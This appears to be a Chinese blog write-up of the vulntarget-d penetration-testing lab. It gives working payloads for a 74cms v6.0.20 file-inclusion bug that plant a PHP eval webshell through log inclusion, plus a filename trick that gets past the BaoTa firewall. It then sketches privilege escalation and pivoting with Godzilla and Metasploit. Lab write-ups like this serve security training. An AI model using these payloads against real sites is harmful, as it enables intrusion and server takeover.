vulntarget-d
配置信息
系统 | ip |
---|---|
kali | 192.168.130.5 |
ubuntu 18 | ip1: 192.168.130.8 ip2: 10.0.10.1 |
win7 | 10.0.10.134 |
网卡修改
ubuntu如果配置上双网卡没显示就如下操作:
// 修改配置文件
sudo vim /etc/network/interfaces
// 之后重启网络
sudo /etc/init.d/networking restart
文件内如下,也可以改成了静态的ip,这个随意。
最后用列出所有网卡查看修改的情况, 网卡配置完成。
实战
web打点
信息收集
发现了3306的MySQL有未授权,然后8888有个登录。
用fscan扫一下,发现8888那有个登录入口一眼宝塔, 81有个骑士cms。
在网页底部找到他的版本信息v6.0.20
就可以去搜索历史漏洞。
骑士cms文件包含
去网上搜了利用的文章,先用post写入一句话。
variable=1&tpl=<?php fputs(fopen("110.php","w"),"<?php eval(\$_POST[110]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>
然后开始包含日志文件,日志文件要和当天的日期一致。
variable=1&tpl=data/Runtime/Logs/Home/23_08_21.log
这里有个点,当写的文件名是shell.php的时候会被宝塔给拦截了但是去Ubuntu里面看确实是写入了,这里直接换个文件名就ok的。
内网渗透
Ubuntu提权
连上哥斯拉上来丝滑三连发现第二个网段,转战msf进行提权。
本来想偷懒直接用哥斯拉反弹过去的,但是效果不好一下就会断掉。
老老实实传msf
标签:__,10.0,10.3,10.2,open,192.168,wp,vulntarget From: https://www.cnblogs.com/bktown/p/17648645.html